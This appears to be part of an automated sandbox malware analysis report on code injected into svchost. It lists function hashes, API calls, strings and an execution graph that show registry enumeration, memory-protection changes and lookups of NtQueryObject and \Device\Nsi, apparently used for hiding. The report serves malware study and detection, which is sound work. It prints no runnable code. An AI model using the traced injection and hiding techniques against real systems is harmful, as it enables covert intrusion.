                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: 0478c1a3af261ca2c2e0ef0fcd73c2b7d176ce7ca8816933a5e730a685654da8
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: 6A018036548B90DEE706DFE2E8855AA67A1F749F8AF045028DA4F83715DF36C050C780
                                                        Function 000001CBD8BE2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 66dc8eb791194b220bed5d3989a0fe2ba9d1d817296486305e4d0376b7eb8cdb
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: D791A132648B5089F7629FE584C2BFD2BA8A704B8EF145109EE0F97695DB37C446C780
                                                        Function 000001CBD8BD7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 26315b277f0833fa29e6206e1a37c947975b73cd93ff35a93702093b29e9861a
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 24114C32755B0089FB01CBE0E8967A933B4F71976DF441E21DA6E827A4DB7AC198C380
                                                        Function 000001CBD8BD253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 0f062c2000fda37f594db2641492732ab4a3e092627b12192f5d619f654c7c9e
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 6771D3362487C195F6349FE59882BF96B9AF389B8AF440025DD0F87B99DB37C945C380
                                                        Function 000001CBD8BA9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 8a50fd077b55d767147a8b684bd0014825f6ee4c9455cdaf633ba578169a54a8
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 4F616832608B448AFB208FA5D0817ED77A0F344B8DF044216EE6E57B99DBBAD055C784
                                                        Function 000001CBD8BD2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: a2bfb7fda913f1e1fe19f6c7b4fcb7ee1ffa8c84edc466839910cc72a59897c2
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 3C51073224C7C2A1F6258BE9A1E5BFA6656F38574AF440015CE4F83B5ADB3BD505C7C0
                                                        Function 000001CBD8BE26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: cd8d986b631c472f2e62d269227b9dd1cdefb2696399252b170650b3eb51d930
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: BE41D632319B4085EB21CFA5E4857E977A5F788799F404021EE4EC7794DB3EC401C780
                                                        Function 000001CBD8BD94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: eebf817035f43bb8bd238e610929092bc7213130e6fb6148e294eab5ce3c98b4
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 78113032258B4082FB618F55F4407A977E5F788B99F584220DE8E47759DF3EC551CB40
                                                        Function 000001CBD8BA7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 8889b0c47ec14da33e3277f015dfdf4e0413e94902c43d1922f8fea6f1334091
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 1BE08671684B4890EF018FA2E8816E833A0DB68B68F489122D95D46321FB39D1F9C341
                                                        Function 000001CBD8BA73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 377f2ecfa8fe3b999a50dcb3cab1f77f510c3be82b2217139a6f9118ea1a173d
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 57E08671644F4880EF028FA1D4815E87360E768B58F889122C94D46321EB39D1E5C341
                                                        Function 000001CBD8BD1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 912d26b72c26ad93e34c569596d669a6ded88d197370947b8223babb3ee4b667
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 9511B235605B4495FA05CBE6A485ABAB3A1F789FCAF085028CE4F87765DF3BC446C380

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:66
                                                        Total number of Limit Nodes:2
                                                        execution_graph 14702 1f2bd13273c 14703 1f2bd13276a 14702->14703 14704 1f2bd132858 LoadLibraryA 14703->14704 14705 1f2bd1328d4 14703->14705 14704->14703 14706 1f2bd161abc 14711 1f2bd161628 GetProcessHeap HeapAlloc 14706->14711 14708 1f2bd161ad2 Sleep SleepEx 14709 1f2bd161acb 14708->14709 14709->14708 14710 1f2bd161598 StrCmpIW StrCmpW 14709->14710 14710->14709 14755 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14711->14755 14713 1f2bd161650 14756 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14713->14756 14715 1f2bd161661 14757 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14715->14757 14717 1f2bd16166a 14758 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14717->14758 14719 1f2bd161673 14720 1f2bd16168e RegOpenKeyExW 14719->14720 14721 1f2bd1618a6 14720->14721 14722 1f2bd1616c0 RegOpenKeyExW 14720->14722 14721->14709 14723 1f2bd1616e9 14722->14723 14724 1f2bd1616ff RegOpenKeyExW 14722->14724 14759 1f2bd1612bc RegQueryInfoKeyW 14723->14759 14726 1f2bd161723 14724->14726 14727 1f2bd16173a RegOpenKeyExW 14724->14727 14768 1f2bd16104c RegQueryInfoKeyW 14726->14768 14728 1f2bd161775 RegOpenKeyExW 14727->14728 14729 1f2bd16175e 14727->14729 14733 1f2bd161799 14728->14733 14734 1f2bd1617b0 RegOpenKeyExW 14728->14734 14732 1f2bd1612bc 16 API calls 14729->14732 14736 1f2bd16176b RegCloseKey 14732->14736 14737 1f2bd1612bc 16 API calls 14733->14737 14738 1f2bd1617d4 14734->14738 14739 1f2bd1617eb RegOpenKeyExW 14734->14739 14736->14728 14740 1f2bd1617a6 RegCloseKey 14737->14740 14741 1f2bd1612bc 16 API calls 14738->14741 14742 1f2bd161826 RegOpenKeyExW 14739->14742 14743 1f2bd16180f 14739->14743 14740->14734 14746 1f2bd1617e1 RegCloseKey 14741->14746 14744 1f2bd161861 RegOpenKeyExW 14742->14744 14745 1f2bd16184a 14742->14745 14747 1f2bd16104c 6 API calls 14743->14747 14749 1f2bd161885 14744->14749 14750 1f2bd16189c RegCloseKey 14744->14750 14748 1f2bd16104c 6 API calls 14745->14748 14746->14739 14751 1f2bd16181c RegCloseKey 14747->14751 14752 1f2bd161857 RegCloseKey 14748->14752 14753 1f2bd16104c 6 API calls 14749->14753 14750->14721 14751->14742 14752->14744 14754 1f2bd161892 RegCloseKey 14753->14754 14754->14750 14755->14713 14756->14715 14757->14717 14758->14719 14760 1f2bd161327 GetProcessHeap HeapAlloc 14759->14760 14761 1f2bd16148a RegCloseKey 14759->14761 14762 1f2bd161476 GetProcessHeap HeapFree 14760->14762 14763 1f2bd161352 RegEnumValueW 14760->14763 14761->14724 14762->14761 14764 1f2bd1613a5 14763->14764 14764->14762 14764->14763 14766 1f2bd1613d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14764->14766 14767 1f2bd16141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14764->14767 14773 1f2bd16152c 14764->14773 14766->14767 14767->14764 14769 1f2bd1611b5 RegCloseKey 14768->14769 14771 1f2bd1610bf 14768->14771 14769->14727 14770 1f2bd1610cf RegEnumValueW 14770->14771 14771->14769 14771->14770 14772 1f2bd16114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14771->14772 14772->14771 14774 1f2bd16157c 14773->14774 14777 1f2bd161546 14773->14777 14774->14764 14775 1f2bd161565 StrCmpW 14775->14777 14776 1f2bd16155d StrCmpIW 14776->14777 14777->14774 14777->14775 14777->14776

                                                        Executed Functions

                                                        Function 000001F2BD16328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: b8f2d5d8970c08e30104490078ba1f72add17956867f785404ba5962f5222235
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 02118078A30A4382FB609B61F8393F923E4B754B45FD88238ED06815B1EF79C044C203
                                                        Function 000001F2BD161ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000001F2BD161628: GetProcessHeap.KERNEL32 ref: 000001F2BD161633
                                                          • Part of subcall function 000001F2BD161628: HeapAlloc.KERNEL32 ref: 000001F2BD161642
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1616B2
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1616DF
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1616F9
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161719
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161734
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161754
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD16176F
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD16178F
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1617AA
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1617CA
                                                        • Sleep.KERNEL32 ref: 000001F2BD161AD7
                                                        • SleepEx.KERNELBASE ref: 000001F2BD161ADD
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1617E5
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161805
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161820
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161840
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD16185B
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD16187B
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161896
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1618A0
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: dbf663d1485315679b68e8288550e8b7b0c6c51f1b1d89a94094fb3e67a57733
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 7731B97922464382EB509B26EA713F973B5AB85BC0F985835DE0A87695FF34C8D18312
                                                        Function 000001F2BD163844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 57 1f2bd163844-1f2bd16384f 58 1f2bd163869-1f2bd163870 57->58 59 1f2bd163851-1f2bd163864 StrCmpNIW 57->59 59->58 60 1f2bd163866 59->60 60->58
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: 3aac585823334c127dda7282b47a4669109186ccc3810c2214bda50ad0b13ecd
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: 81D05EB43216078AFB549FE698E46F02354AB08744FCC4134CD0441160DB38898DE611
                                                        Function 000001F2BD13273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796321161.000001F2BD130000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD130000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd130000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 5a31c6780180920593c79de93fd5a78e32e1db436847973b0c6c9579bd3f76a4
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: CB61EF32B216A297EF54AF1590207FDB3A2FB54BA4F98C131DE5907788DA38D852C701

                                                        Non-executed Functions

                                                        Function 000001F2BD162B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 355 1f2bd162b2c-1f2bd162ba5 call 1f2bd182ce0 358 1f2bd162ee0-1f2bd162f03 355->358 359 1f2bd162bab-1f2bd162bb1 355->359 359->358 360 1f2bd162bb7-1f2bd162bba 359->360 360->358 361 1f2bd162bc0-1f2bd162bc3 360->361 361->358 362 1f2bd162bc9-1f2bd162bd9 GetModuleHandleA 361->362 363 1f2bd162bed 362->363 364 1f2bd162bdb-1f2bd162beb GetProcAddress 362->364 365 1f2bd162bf0-1f2bd162c0e 363->365 364->365 365->358 367 1f2bd162c14-1f2bd162c33 StrCmpNIW 365->367 367->358 368 1f2bd162c39-1f2bd162c3d 367->368 368->358 369 1f2bd162c43-1f2bd162c4d 368->369 369->358 370 1f2bd162c53-1f2bd162c5a 369->370 370->358 371 1f2bd162c60-1f2bd162c73 370->371 372 1f2bd162c75-1f2bd162c81 371->372 373 1f2bd162c83 371->373 374 1f2bd162c86-1f2bd162c8a 372->374 373->374 375 1f2bd162c8c-1f2bd162c98 374->375 376 1f2bd162c9a 374->376 377 1f2bd162c9d-1f2bd162ca7 375->377 376->377 378 1f2bd162d9d-1f2bd162da1 377->378 379 1f2bd162cad-1f2bd162cb0 377->379 382 1f2bd162da7-1f2bd162daa 378->382 383 1f2bd162ed2-1f2bd162eda 378->383 380 1f2bd162cc2-1f2bd162ccc 379->380 381 1f2bd162cb2-1f2bd162cbf call 1f2bd16199c 379->381 385 1f2bd162d00-1f2bd162d0a 380->385 386 1f2bd162cce-1f2bd162cdb 380->386 381->380 387 1f2bd162dac-1f2bd162db8 call 1f2bd16199c 382->387 388 1f2bd162dbb-1f2bd162dc5 382->388 383->358 383->371 393 1f2bd162d0c-1f2bd162d19 385->393 394 1f2bd162d3a-1f2bd162d3d 385->394 386->385 392 1f2bd162cdd-1f2bd162cea 386->392 387->388 389 1f2bd162dc7-1f2bd162dd4 388->389 390 1f2bd162df5-1f2bd162df8 388->390 389->390 399 1f2bd162dd6-1f2bd162de3 389->399 400 1f2bd162e05-1f2bd162e12 lstrlenW 390->400 401 1f2bd162dfa-1f2bd162e03 call 1f2bd161bbc 390->401 402 1f2bd162ced-1f2bd162cf3 392->402 393->394 403 1f2bd162d1b-1f2bd162d28 393->403 396 1f2bd162d3f-1f2bd162d49 call 1f2bd161bbc 394->396 397 1f2bd162d4b-1f2bd162d58 lstrlenW 394->397 396->397 410 1f2bd162d93-1f2bd162d98 396->410 405 1f2bd162d5a-1f2bd162d64 397->405 406 1f2bd162d7b-1f2bd162d8d call 1f2bd163844 397->406 407 1f2bd162de6-1f2bd162dec 399->407 411 1f2bd162e14-1f2bd162e1e 400->411 412 1f2bd162e35-1f2bd162e3f call 1f2bd163844 400->412 401->400 418 1f2bd162e4a-1f2bd162e55 401->418 409 1f2bd162cf9-1f2bd162cfe 402->409 402->410 413 1f2bd162d2b-1f2bd162d31 403->413 405->406 416 1f2bd162d66-1f2bd162d79 call 1f2bd16152c 405->416 406->410 421 1f2bd162e42-1f2bd162e44 406->421 417 1f2bd162dee-1f2bd162df3 407->417 407->418 409->385 409->402 410->421 411->412 422 1f2bd162e20-1f2bd162e33 call 1f2bd16152c 411->422 412->421 413->410 423 1f2bd162d33-1f2bd162d38 413->423 416->406 416->410 417->390 417->407 425 1f2bd162e57-1f2bd162e5b 418->425 426 1f2bd162ecc-1f2bd162ed0 418->426 421->383 421->418 422->412 422->418 423->394 423->413 430 1f2bd162e63-1f2bd162e7d call 1f2bd1685c0 425->430 431 1f2bd162e5d-1f2bd162e61 425->431 426->383 434 1f2bd162e80-1f2bd162e83 430->434 431->430 431->434 437 1f2bd162ea6-1f2bd162ea9 434->437 438 1f2bd162e85-1f2bd162ea3 call 1f2bd1685c0 434->438 437->426 440 1f2bd162eab-1f2bd162ec9 call 1f2bd1685c0 437->440 438->437 440->426
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 107207480c6beedcfac9e10622a0404f813cce9df297bff4ecca76f0d2a71204
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 16B18D7A231A9386EB69CF25D4607F963A5FB44B94F845036EE4953B94EF35CC80C342
                                                        Function 000001F2BD167D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 2191b91c7ae414d5341e28445c4bdcd7f9ae6a593b554c58698db7f92569058a
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: AB314F76215B828AEBA49F60E8607FD7364F784748F84443ADE4D57B98EF38C548C711
                                                        Function 000001F2BD1612BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 630f6eb47bae6733bdbe7fb6a2d06b5e13df8154db8fa66121e5b802eb99e1ef
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: C6515BB6220B8686EB54CF62E4683EA77A1F789B99F844134DE4907B29DF3CC445C701
                                                        Function 000001F2BD161D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
